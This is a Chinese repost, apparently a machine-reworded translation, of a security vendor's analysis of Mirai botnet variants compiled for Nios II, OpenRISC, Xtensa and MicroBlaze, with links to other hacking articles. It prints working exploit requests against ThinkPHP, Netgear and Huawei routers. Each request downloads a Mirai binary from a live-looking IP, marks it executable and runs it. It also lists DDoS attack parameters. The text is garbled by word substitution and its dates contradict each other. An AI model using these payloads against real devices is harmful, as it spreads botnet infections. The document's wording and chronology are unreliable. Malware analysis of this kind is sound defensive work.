支撑新处理器架构的Mirai变种呈现

访客6年前黑客资讯703

概述
2019年2月底,unit 42研究人员发现了新出现的为新处理器架构编译的Mirai样本。尽管Mirai的源码在2019年就揭露了,可是它的进犯方针是特定的一批处理器架构集。
Unit 42研究人员发现了专为Altera Nios II, OpenRISC, Tensilica Xtensa和Xilinx MicroBlaze处理器的样本。这是Mirai第2次扩展新的处理器架构,上一次是2019年1月发现的进犯ARC CPU的样本。这阐明Mirai的开发者还在不断更新技能,并进犯IOT设备。
本文首要介绍新发现的样本相关的基础设施,以及其他Mirai样本怎么运用已知的缝隙运用等。
新样本的新特征
除了支撑新的处理器架构外,研究人员还在新样本中发现了以下特征:
加密算法。新样本对本来Mirai代码中运用的规范字节XOR算法进行了修正。运用11个8字节的key,一切都运用字节级的XOR来获取终究的key,代码如下:
tablekeys = [0xdeadbeef, 0x85DAB8BF, 0xDEEDEEBF, 0xDEABBEAF, 0xDBBD45BF, 0x246584EF, 0x85BFE8BF, 0xD68395BF, 0xDBAAAAAF, 0x0DAABEEF]
xor_key = 0
for key in tablekeys:
xor_key ^= key&0xff ^ (key>>8 & 0xff) ^ (key>>16 & 0xfF) ^ (key>>24 & 0xff)
这相当于与0x5A进行字节级的XOR运算。
attack_method_ovh。样本中含有以下参数的DDOS进犯选项:
ATK_OPT_IP_TOS = 0
ATK_OPT_IP_IDENT = 0xFFFF
ATK_OPT_IP_TTL = 64
ATK_OPT_IP_DF = 1
ATK_OPT_SPORT = 0xFFFF
ATK_OPT_DPORT = 0xFFFF
ATK_OPT_SEQRND = 0xFFFF
ATK_OPT_ACKRND = 0
ATK_OPT_URG = 0
ATK_OPT_ACK = 0
ATK_OPT_PSH = 0
ATK_OPT_RST = 0
ATK_OPT_SYN = 1
ATK_OPT_FIN = 0
ATK_OPT_SOURCE = LOCAL_ADDR
这与本来Mirai源代码中的进犯办法“TCP SYN” (attack_method_tcpsyn)的参数是相同的,所以为什么要将相同的参数加入到一个新的进犯办法中呢?现在尚不清楚原因。据此,研究人员发现了从2019年11月开端就运用该办法的样本。
基础设施
研究人员在一个IP地址上发现了多个最新的样本,但2019年2月22日开端,该服务器将这些文件列表躲藏起来了,可是还为文件供给web服务。

图1. 保存Mirai变种代码的目录
在2月22日之前,该IP地址还供给含有以下缝隙运用的Mirai样本。这些缝隙运用都是在之前的Mirai样本中运用过的。研究人员依据这些缝隙运用估测这些变种应该是同一波进犯者在运用,缝隙运用如下:
· ThinkPHP长途代码履行缝隙
运用格局:
GET /to/thinkphp5.1.29/?s=index/ hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= ‘wget http://178.62.227[.]13/wrgjwrgjwrg246356356356/hx86 -O /tmp/Hito; chmod 777 /tmp/Hito; /tmp/Hito wget.exploit.selfrep.thinkphp’ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Hito/2.0
· D-Link DSL2750B OS指令注入缝隙
运用格局:

· Netgear长途代码履行缝隙
运用格局:
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;/bin/busybox+wget+-g+178.62.227[.]13+-l+/tmp/binary+-r+/wrgjwrgjwrg246356356356/hmips;+/bin/busybox+chmod 777+*+/tmp/binary;/tmp/binary+wget.selfrep.exploit.netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
· CVE-2014-8361
运用格局:

· CVE-2019-17215
运用格局:
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username=”dslf-config”, realm=”HuaweiHomeGateway”, nonce=”88645cefb1f9ede0e336e3569d75ee30″, uri=”/ctrlt/DeviceUpgrade_1″, response=”3612f843a42db38f48f59d2a3597e19c”, algorithm=”MD5″, qop=”auth”, nc=00000001, cnonce=”248d1a2560100669″
$(/bin/busybox wget -g 178.62.227.13 -l /tmp/binary -r /wrgjwrgjwrg246356356356/hmips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary wget.selfrep.exploit.huawei)$(echo HUAWEIUPNP)
总结
由于Mirai源代码是揭露的,因而开源将源代码进行习惯其他处理器的编译,以供给给进犯者更大的进犯面。这也阐明该歹意软件宗族会经过更多的嵌入式设备感染和传达,供给给进犯者更强壮的DDOS进犯的才能。
研究人员主张企业和用户对IOT设备及时更新补丁,并不要运用默许口令。
 

相关文章

VulnHub挑战赛Pipe解题思路

今日我将给我们演示我是怎么处理VulnHub挑战赛这道名为Pipe标题的。 当然CTF玩的便是思路,这篇文章的思路纷歧定是最好的。只是作为抛砖,欢迎我们在文尾下载这道标题来玩! 枚举 PORT    ...

再度瞄准工控设备基础设施:针对TRITON歹意活动的详细分析

FireEye近期承认TRITON歹意活动正在针对一个新的要害基础设施建议进犯,咱们现在现已对该歹意行为采取了呼应办法。 2019年12月,FireEye揭露发布了咱们针对TRITON进犯的第一次剖析...

反击爬虫,前端工程师的脑洞能够有多大?

关于一张网页,咱们往往期望它是结构杰出,内容明晰的,这样搜索引擎才干精确地认知它。 而反过来,又有一些情形,咱们不期望内容能被容易获取,比方说电商网站的交易额,教育网站的标题等。由于这些内容,往往是...

你的PoC和EXP可能得改改了-黑客接单平台

一、前语 在MySQL 5.7.5之前的所有主版别存在一个BUG,该或许导致影响POC/EXP需求从头编写或批改的问题。 BUG信息链接: https://bugs.mysql.com/bug.ph...

运用Subversion完成网站自动更新

Subversion概述     概述     Subversion,简称SVN,是一个开放源代码的版别控制体系,相对于的RCS、CVS,采用了分支办理体系。     网站更新拓扑结构       ...

记一次对WebScan的Bypass

今日测验了一个网站,发现存在360webscan的阻拦,所以便开端了一波“bypass”。 进入主题 1. 判别注入点 运用“and 1=1”测验了一下,惨遭阻拦。随后又测验了一下or也是被阻拦的。...